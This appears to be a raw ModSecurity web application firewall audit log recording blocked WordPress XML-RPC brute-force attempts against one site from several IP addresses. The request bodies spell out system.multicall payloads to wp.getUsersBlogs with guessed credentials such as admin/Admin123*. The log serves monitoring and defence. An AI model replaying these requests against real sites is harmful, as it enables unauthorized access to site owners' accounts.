[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749098959797691 5193 (- - -) Stopwatch2: 1749098959797691 5193; combined=3851, p1=527, p2=3151, p3=0, p4=0, p5=103, sr=164, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4746ac4a-Z-- --1b085c2c-A-- [05/Jun/2025:11:50:56 +0700] aEEiMH-K7ToMdu-YSIIj-QAAAAg 103.236.140.4 34640 103.236.140.4 8181 --1b085c2c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1b085c2c-C-- system.multicallmethodNamewp.getUsersBlogsparamswordcampz43218765z --1b085c2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b085c2c-E-- --1b085c2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099056125279 5471 (- - -) Stopwatch2: 1749099056125279 5471; combined=3917, p1=460, p2=3285, p3=0, p4=0, p5=102, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b085c2c-Z-- --0880cc24-A-- [05/Jun/2025:11:52:07 +0700] aEEid3-K7ToMdu-YSIIkAAAAABE 103.236.140.4 34674 103.236.140.4 8181 --0880cc24-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0880cc24-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123* --0880cc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0880cc24-E-- --0880cc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099127614158 6117 (- - -) Stopwatch2: 1749099127614158 6117; combined=4257, p1=507, p2=3562, p3=0, p4=0, p5=112, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0880cc24-Z-- --c0913a69-A-- [05/Jun/2025:11:52:12 +0700] aEEifH-K7ToMdu-YSIIkAQAAAA8 103.236.140.4 34676 103.236.140.4 8181 --c0913a69-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c0913a69-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123* --c0913a69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0913a69-E-- --c0913a69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099132106555 5116 (- - -) Stopwatch2: 1749099132106555 5116; combined=3793, p1=451, p2=3173, p3=0, p4=0, p5=99, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0913a69-Z-- --5a520152-A-- [05/Jun/2025:11:54:11 +0700] aEEi8-th7G2xELALzPYgfwAAAM0 103.236.140.4 34758 103.236.140.4 8181 --5a520152-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a520152-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin786 --5a520152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a520152-E-- --5a520152-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099251329370 5391 (- - -) Stopwatch2: 1749099251329370 5391; combined=3847, p1=475, p2=3199, p3=0, p4=0, p5=102, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a520152-Z-- --dfc8710d-A-- [05/Jun/2025:11:54:45 +0700] aEEjFX-K7ToMdu-YSIIkLAAAAAs 103.236.140.4 34780 103.236.140.4 8181 --dfc8710d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dfc8710d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh786 --dfc8710d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc8710d-E-- --dfc8710d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099285514928 4412 (- - -) Stopwatch2: 1749099285514928 4412; combined=3500, p1=382, p2=2952, p3=0, p4=0, p5=96, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc8710d-Z-- --c4042b47-A-- [05/Jun/2025:11:56:11 +0700] aEEja3-K7ToMdu-YSIIkMgAAABQ 103.236.140.4 34852 103.236.140.4 8181 --c4042b47-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c4042b47-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@@ --c4042b47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4042b47-E-- --c4042b47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099371079650 5043 (- - -) Stopwatch2: 1749099371079650 5043; combined=3693, p1=398, p2=3116, p3=0, p4=0, p5=106, sr=80, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4042b47-Z-- --d78b1b51-A-- [05/Jun/2025:11:56:19 +0700] aEEjc1wdJdhOudw5hdzOwQAAAJQ 103.236.140.4 34864 103.236.140.4 8181 --d78b1b51-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d78b1b51-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123admin --d78b1b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d78b1b51-E-- --d78b1b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099379554961 4604 (- - -) Stopwatch2: 1749099379554961 4604; combined=3650, p1=399, p2=3064, p3=0, p4=0, p5=107, sr=80, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d78b1b51-Z-- --b93c3d32-A-- [05/Jun/2025:11:56:21 +0700] aEEjdVwdJdhOudw5hdzOwgAAAJU 103.236.140.4 34870 103.236.140.4 8181 --b93c3d32-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b93c3d32-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@@ --b93c3d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b93c3d32-E-- --b93c3d32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099381733225 4912 (- - -) Stopwatch2: 1749099381733225 4912; combined=3660, p1=360, p2=3113, p3=0, p4=0, p5=110, sr=74, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b93c3d32-Z-- --04f4b771-A-- [05/Jun/2025:11:57:37 +0700] aEEjwVwdJdhOudw5hdzOwwAAAJM 103.236.140.4 34896 103.236.140.4 8181 --04f4b771-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --04f4b771-C-- system.multicallmethodNamewp.getUsersBlogsparamssoleh[Login]123soleh --04f4b771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f4b771-E-- --04f4b771-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099457930493 5348 (- - -) Stopwatch2: 1749099457930493 5348; combined=3904, p1=454, p2=3275, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f4b771-Z-- --7c73cd0f-A-- [05/Jun/2025:11:58:01 +0700] aEEj2X-K7ToMdu-YSIIkQgAAAAw 103.236.140.4 34914 103.236.140.4 8181 --7c73cd0f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7c73cd0f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh456 --7c73cd0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c73cd0f-E-- --7c73cd0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099481428702 6477 (- - -) Stopwatch2: 1749099481428702 6477; combined=4637, p1=581, p2=3879, p3=0, p4=0, p5=105, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c73cd0f-Z-- --591ae42a-A-- [05/Jun/2025:11:59:57 +0700] aEEkTSrHpfaS2Cuwh8XT4wAAAE0 103.236.140.4 34974 103.236.140.4 8181 --591ae42a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --591ae42a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh2013 --591ae42a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --591ae42a-E-- --591ae42a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099597705079 5954 (- - -) Stopwatch2: 1749099597705079 5954; combined=4266, p1=530, p2=3562, p3=0, p4=0, p5=103, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --591ae42a-Z-- --ccb35411-A-- [05/Jun/2025:12:00:36 +0700] aEEkdCrHpfaS2Cuwh8XT6gAAAFc 103.236.140.4 34996 103.236.140.4 8181 --ccb35411-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ccb35411-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin22 --ccb35411-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccb35411-E-- --ccb35411-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099636370620 3274 (- - -) Stopwatch2: 1749099636370620 3274; combined=2347, p1=267, p2=1954, p3=0, p4=0, p5=74, sr=56, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccb35411-Z-- --98561101-A-- [05/Jun/2025:12:01:10 +0700] aEEklirHpfaS2Cuwh8XT8gAAAEQ 103.236.140.4 35020 103.236.140.4 8181 --98561101-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --98561101-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh2022! --98561101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98561101-E-- --98561101-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099670883587 4762 (- - -) Stopwatch2: 1749099670883587 4762; combined=3643, p1=393, p2=3089, p3=0, p4=0, p5=94, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98561101-Z-- --4556d215-A-- [05/Jun/2025:12:02:26 +0700] aEEk4irHpfaS2Cuwh8XUAAAAAFM 103.236.140.4 35054 103.236.140.4 8181 --4556d215-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4556d215-C-- system.multicallmethodNamewp.getUsersBlogsparamsusernamePassword --4556d215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4556d215-E-- --4556d215-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099746639088 5875 (- - -) Stopwatch2: 1749099746639088 5875; combined=4198, p1=535, p2=3490, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4556d215-Z-- --513a180c-A-- [05/Jun/2025:12:03:04 +0700] aEElCFwdJdhOudw5hdzO0gAAAIw 103.236.140.4 35092 103.236.140.4 8181 --513a180c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --513a180c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh99 --513a180c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --513a180c-E-- --513a180c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099784051797 33436 (- - -) Stopwatch2: 1749099784051797 33436; combined=60467, p1=439, p2=2568, p3=0, p4=0, p5=28744, sr=70, sw=111, l=0, gc=28605 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --513a180c-Z-- --fcab7b6a-A-- [05/Jun/2025:12:03:25 +0700] aEElHSrHpfaS2Cuwh8XUDAAAAEI 103.236.140.4 35110 103.236.140.4 8181 --fcab7b6a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fcab7b6a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadminadmin --fcab7b6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcab7b6a-E-- --fcab7b6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 